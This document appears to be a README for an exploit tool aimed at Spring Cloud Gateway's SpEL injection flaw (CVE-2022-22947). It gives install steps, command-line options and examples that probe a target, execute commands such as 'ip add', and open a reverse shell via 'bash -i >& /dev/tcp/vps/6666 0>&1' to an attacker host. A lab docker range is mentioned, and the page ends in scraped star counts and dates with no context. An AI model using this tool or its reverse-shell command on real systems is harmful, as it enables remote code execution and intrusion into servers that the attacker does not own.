Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)
1.installation
pip3 install -r requirements.txt
2.Usage
$ python3 spring-cloud-gateway-rce.py -h
___ __ ____ ___ ____ ____ ____ ____ ___ _ _ _____
/ __\ /\ /\ /__\ |___ \ / _ \ |___ \ |___ \ |___ \ |___ \ / _ \ | || | |___ |
/ / \ \ / / /_\ _____ __) || | | | __) | __) | _____ __) | __) || (_) || || |_ / /
/ /___ \ V / //__ |_____| / __/ | |_| | / __/ / __/ |_____| / __/ / __/ \__, ||__ _| / /
\____/ \_/ \__/ |_____| \___/ |_____||_____| |_____||_____| /_/ |_| /_/
CVE-2022-22947 Spring Cloud Gateway RCE
By:K3rwin
usage: spring-cloud-gateway-rce.py [-h] [-u URL] [-c CMD] [-s SYSTEM]
Spring Cloud Gateway RCE 帮助指南
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 指定url
-c CMD, --cmd CMD 指定执行的命令,默认执行whoami
-s SYSTEM, --system SYSTEM
指定目标主机操作系统,默认linux,参数为win/linux
3.example
① -u 探测漏洞
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/"
② -c 指定执行命令
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "ip add"
③ 反弹shell
python3 spring-cloud-gateway-rce.py -u "http://192.168.50.111:8080/" -c "bash -i >& /dev/tcp/vps/6666 0>&1"
docker靶场
vulfocus
4 Jan 17, 2022
96 Dec 14, 2022
10 Oct 29, 2022
14 Jul 08, 2022
48 Dec 29, 2022
34 Nov 15, 2022
104 Nov 09, 2022
13 Dec 08, 2022
27 Dec 20, 2022
2 Dec 19, 2021
1 Dec 24, 2021
2 Dec 16, 2021
2.7k Jan 09, 2023
1 Jan 05, 2022
11 Nov 15, 2022
57 Oct 03, 2022
4 Jan 27, 2022
4 Apr 16, 2022
559 Jan 03, 2023